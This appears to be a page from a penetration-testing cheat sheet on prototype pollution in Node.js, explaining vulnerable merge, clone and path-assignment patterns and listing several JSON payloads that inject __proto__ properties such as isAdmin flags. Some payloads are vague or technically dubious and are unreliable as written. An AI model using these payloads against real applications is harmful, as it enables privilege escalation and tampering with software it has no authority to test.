Prototype Pollution

Affects Node.js

Prototype pollution happens at some unsafe merge, clone, extend and path assignment operations on malicious JSON objects.

  • This is exploitable only if any of the following three happens:

    • Object recursive merge

    • Property definition by path

    • Object clone

  • Some of the most popular libraries being affected are lodash and Hoek

  • Templates are a good target for prototype pollution.

Payloads

  • The most straightforward example of prototype pollution involves injecting the __proto__ property, which affects all objects that inherit from Object.prototype.

  • This example adds the isUserAdmin property to the prototype chain:

{
  "__proto__": {
    "isUserAdmin": true
  }
}

  • Also, you can directly manipulate the Object.prototype by modifying the __proto__ property. This could be done in objects passed to vulnerable code:

{
  "__proto__": {
    "toString": "malicious code"
  }
}

  • If the application allows you to define properties via paths (e.g., obj.a.b):

{
  "a.b.__proto__.isHacked": true
}

  • The constructor property is part of the prototype chain for JavaScript objects:

{
  "__proto__.constructor": "MaliciousFunction"
}

  • The hasOwnProperty method is often used to check if an object has a property, but it can be overridden in the prototype:

{
  "__proto__.hasOwnProperty": false
}

  • If an attacker can manipulate built-in objects' prototypes (like Array.prototype or Function.prototype), they could affect the behavior of all instances of those types:

{
  "__proto__.length": 1000
}

  • If the application uses a templating engine and allows user input to be rendered without sanitization, an attacker might inject a prototype pollution payload directly via the template:

{
  "__proto__": {
    "isAdmin": true
  }
}

  • You can directly inject properties into the prototype of custom classes or objects:

{
  "customObjectPrototype.isHacked": true
}

PreviousPath TraversalNextXXE

Last updated